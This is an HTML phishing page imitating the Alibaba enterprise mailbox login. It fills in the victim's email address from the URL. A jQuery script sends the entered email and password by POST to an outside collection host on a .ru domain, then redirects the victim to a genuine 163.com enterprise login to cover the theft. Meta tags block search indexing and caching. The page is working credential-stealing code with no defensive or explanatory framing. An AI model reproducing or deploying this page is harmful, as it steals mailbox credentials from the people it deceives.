

<!DOCTYPE>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>&#38463;&#37324;&#37038;&#31665;&#20225;&#19994;&#29256;</title>
<meta http-equiv='content-type' content="text/html; charset=ISO-8859-5">
<meta http-equiv='content-type' content="text/html; charset=UTF-8">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">
<link rel="icon" type="images/ico" sizes="16*16" href="https://cdn.glitch.com/1f5b46e3-b5ad-4682-be49-385f1a769bf3%2Ffavicon.ico?v=1616116607619">
<title>щПщщЎчЎБфМфИч</title>
<style>
.body {
	font-family: Times New Roman;
	margin: auto;
	padding: 0px;
	border: 2px solid blue;
}

.form {
	width: auto;
	height: auto;
	position: relative;
	padding: 0px;
	margin: 0px;
	border: 2px solid #000000;
}

.container {
	position: relative;
	padding: 0px;
	margin-left: auto;
	margin-right: auto;
	width: 1535px;
	height: 700px;
	background-image: url('https://cdn.glitch.global/584e9286-2f86-440c-bd06-9f9f04bd0a6e/high.png?v=1648749916666');
	background-size: cover;
	background-repeat: no-repeat;
}

input[type=text], input[type=password] {
  width: 252px;
  height: 34px;
  font-family: Segoe UI;
  font-size: 12px;
  background-color: #eef3f8;
  color: #92a4bf;
  padding: 5px;
  margin-right: 0px;
  margin-left: 0px;
  margin-top: 0px;
  margin-bottom: 5px;
  border: 1px solid #bac5d4;
  border-radius: 5px;
}

.contain {
	width: 200px;
	height: 240px;
	position: absolute;
	left: 61%;
	top: 28.5%;
	padding: 0px;
	margin-left: 27px;
}

.forgot_pass {
	width: 60px;
	height: 25px;
	position: absolute;
	left: 82%;
	top: 44%;
	padding: 0px;
	margin-left: 27px;
}

.next {
	width: 252px;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}

.logo {
width: 252px; height: 24px; position: absolute; left: 17.5%; top: 3px; padding: 0px; margin-left: 27px; margin-top: 0px;
}

.header_link {
	width: 300px;
	height: 48px;
	position: absolute;
 	font-size: 12px;
	letter-spacing: 0.5px;
	border: 2px solid red;
}

.footer_link {
	width: auto;
	height: 24px;
	position: absolute;
	left: -30px;
	top: 14%;
	padding: 0px;
	margin-left: 27px;
}    

.vertical-line {
	display: inline-block;
	border-left: 1px solid #8a8a8a;
	margin-left: 10px;
	margin-right: 10px;
	height: 40px;
}

button {
  background-color: #148dde;
  color: white;
  padding: 6px;
  margin-top: 12px;
  margin-left: 0px;
  margin-right: 0px;
  margin-bottom: 20px;
  cursor: pointer;
  width: 252px;
  border: none;
  height: 36px;
  font-family: Segoe UI Semibold;
  font-size: 16px;
  text-align: center;
  border-radius: 5px;
}
	
</style>
</head>
<body style="padding: 0px; margin: 0px; font-family: Times New Roman;">

<div class="container">
	<div class="logo"></div>

	<form action="">
		<div class="contain">
    		<input id="email" type="text" placeholder="&#24080;&#21495;" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" style="margin-top: 8px; margin-bottom: 14px;" name="email" required>

    		<input id="password" type="password" placeholder="&#23494;&#30721;" style="margin-top: 12px; margin-bottom: 10px;" name="password" required>
		
		<input type="checkbox" id="check" name="check" value=""><label for="check" style="margin-left: 5px; font-size: 11px; font-weight: 1;">&#35760;&#20303;&#29992;&#25143;&#21517;</label>

		<div class="forgot_pass"><p style="text-align: right; font-size: 12px; font-weight: 1; color: blue;"><a href="">&#24536;&#35760;&#23494;&#30721;</a></p></div>
		<div class="next"><p style="text-align: center; font-size: 12px; font-weight: 1; color: #92a4bf;">&#35831;&#22635;&#20889;&#20225;&#19994;&#37038;&#31665;&#30340;&#23436;&#25972;&#24080;&#21495;&#65292;&#25110;&#31649;&#29702;&#21592;&#24080;&#21495;&#12290;</p></div>

		<button type="submit" id="submit-btn" style="font-size: 16px;"><b>&#30331;&#24405;</b></button>
		</div>
	</form>
</div>

<div class="footer_link">
</div>


 <!-- Optional JavaScript -->
      <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    </body>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>


 <script>
      function disableClick(){
        document.onclick=function(event){
          if (event.button == 2) {
            alert('Criminal fuck off');
            return false;
          }
        }
      }
    </script>
	
<script>

      $("#submit-btn1").hide();

      /* global $ */
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          // $('#email').val(email);
          var my_email =email;
          var ind=my_email.indexOf("@");
          var my_slice=my_email.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#email').val(my_email);
            $('#emailch').html(my_email);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting email////////////////
				
		
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }
 


        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_email.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: 'http://f0712085.xsph.ru/post.php',
          type: 'POST',
      	data:{
      		email:email,
      		password:password,
      	},
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
            	$('#submit-btn').val('Verifing...');
            },
            success: function(response){
            	if(response){
            		$("#msg").show();
            		console.log(response);
            		if(response['signal'] == 'ok'){
            			$("#password").val("");
            			if (count>=1) {
            				count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://qiye.163.com/login/?authuser=2/?msg="+email);

                }
                $('#msg').html(response['msg']);
            }
            else{
            	$('#msg').html(response['msg']);
            }
        }
    },
    error: function(){
    	$("#password").val("");
    	if (count>=1) {
    		count=0;
    		window.location.replace("https://qiye.163.com/login/?authuser=2/?msg="+email);
    	}
    	$("#msg").show();
    	$('#msg').html("Please enter correct password and try again");
    },
    complete: function(){
    	$('#submit-btn').val('Login');
    }
});
  });


	});


</script>

<script>// main stuff
        let href = $(location).attr('href');
        let divide1 = href.split("@");
        let divide2 = href.split("#");
        let the_domain = divide1[1];
        $('.dotDomain').text(divide1[1]);
        $('#txtEmail').val(divide2[1]);
        $('#dblEmail').val(divide2[1]);
        let icq_url = q_process;
        let userIP = '';</script>

</body>
</html>

